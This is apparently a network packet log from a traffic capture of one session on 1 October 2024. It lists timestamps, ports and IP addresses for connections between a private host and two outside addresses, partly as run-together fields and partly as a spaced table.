                                                                                                                                Oct 1, 2024 09:25:29.288309097 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:29.288362026 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:29.288698912 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:29.292431116 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:29.427011967 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:29.432002068 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:29.432080984 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:29.432153940 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:29.437246084 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.001705885 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.001729012 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.001740932 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.001805067 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.001806021 CEST4917180192.168.2.22104.168.7.8
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Oct 1, 2024 09:25:30.001816034 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.001827002 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.001837015 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.001852989 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.001868963 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.001899004 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.002008915 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.002022028 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.002080917 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.006778002 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.006798029 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.006808996 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.006865025 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.214873075 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.271934032 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.271949053 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.271961927 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.271998882 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.272022009 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.272033930 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.272046089 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.272057056 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.272069931 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.272095919 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.272111893 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.272275925 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.272288084 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.272300005 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.272342920 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.272438049 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.272448063 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.272464991 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.272476912 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.272485018 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.272486925 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.272497892 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.272509098 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.272516966 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.272520065 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.272537947 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.272538900 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.272552013 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.272562027 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.272598982 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.273272991 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.273286104 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.273336887 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.276947975 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.276993990 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.277007103 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.277045965 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.277144909 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.277293921 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.277333021 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.277343988 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.277369022 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.277390957 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.277441978 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.277452946 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.277508020 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.278155088 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.278197050 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.278207064 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.278256893 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.278281927 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.278292894 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.278404951 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.279036999 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.279093027 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.279104948 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.279135942 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.279166937 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.279179096 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.279226065 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.279941082 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.279985905 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.279997110 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.280025959 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.280041933 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.280054092 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.280100107 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.280792952 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.280839920 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.280850887 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.280883074 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.280946016 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.280956984 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.280997038 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.281670094 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.281718016 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.281730890 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.281763077 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.281785965 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.281800985 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.281840086 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.282520056 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.282568932 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.282586098 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.282654047 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.282655954 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.282665014 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.282721043 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.283415079 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.283480883 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.283492088 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.283529043 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.283911943 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.283963919 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.283968925 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.283976078 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.284018040 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.284446955 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.284492970 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.284503937 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.284538031 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.284590960 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.284603119 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.284645081 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.285284042 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.285434008 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.285464048 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.285540104 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.285552979 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.285586119 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.285602093 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.285614014 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.285657883 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.286369085 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.286391020 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.286401987 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.286443949 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.286490917 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.286503077 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.286540031 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.287285089 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.287374020 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.287393093 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.287405968 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.287424088 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.287448883 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.287587881 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.287646055 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.287659883 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.287727118 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.287738085 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.287749052 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.287760973 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.287792921 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.288211107 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.288259029 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.288270950 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.288290024 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.288301945 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.288317919 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.288569927 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.288711071 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.288749933 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.288760900 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.288791895 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.288810015 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.288829088 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.288840055 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.288850069 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.288903952 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.288914919 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.288927078 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.288932085 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.288944960 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.290271997 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.290317059 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.290328026 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.290328979 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.290368080 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.290606976 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.290617943 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.290630102 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.290641069 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.290658951 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.290671110 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.290672064 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.290699005 CEST  49171        80         192.168.2.22  104.168.7.8
Oct 1, 2024 09:25:30.290702105 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.290712118 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.290723085 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.290734053 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.290751934 CEST  80           49171      104.168.7.8   192.168.2.22
Oct 1, 2024 09:25:30.290759087 CEST  49171        80         192.168.2.22  104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.290766001 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.290781975 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.290874958 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.290920019 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.291006088 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291016102 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291028023 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291038990 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291050911 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291062117 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291069984 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.291090965 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.291141033 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291152000 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291163921 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291176081 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291193962 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.291218996 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291224957 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.291235924 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291249037 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291260958 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291275024 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291320086 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.291341066 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.291485071 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291496038 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291507959 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291532040 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.291799068 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291850090 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291853905 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.291867971 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291938066 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.291940928 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291955948 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.291968107 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.292005062 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.292144060 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.292196035 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.292202950 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.292210102 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.292221069 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.292263031 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.307672977 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.307723045 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.307734013 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.307770967 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.355691910 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.355706930 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.355717897 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.355751991 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.355869055 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.355880976 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.355892897 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.355920076 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356009960 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356020927 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356031895 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356044054 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356070042 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356081009 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356082916 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356175900 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356187105 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356199026 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356209993 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356221914 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356226921 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356232882 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356247902 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356297970 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356425047 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356436014 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356481075 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356509924 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356520891 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356533051 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356545925 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356559992 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356590986 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356668949 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356777906 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356795073 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356806993 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356817961 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356826067 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356829882 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356841087 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356848955 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356857061 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356868982 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.356880903 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.356897116 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.357156038 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357175112 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357219934 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.357309103 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357320070 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357331991 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357342958 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357353926 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357364893 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357367039 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.357383013 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357394934 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357395887 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.357409000 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357435942 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.357742071 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357754946 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357767105 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357779026 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357789993 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357804060 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.357809067 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357816935 CEST4917180192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:30.357820988 CEST8049171104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:30.357832909 CEST8049171104.168.7.8192.168.2.22
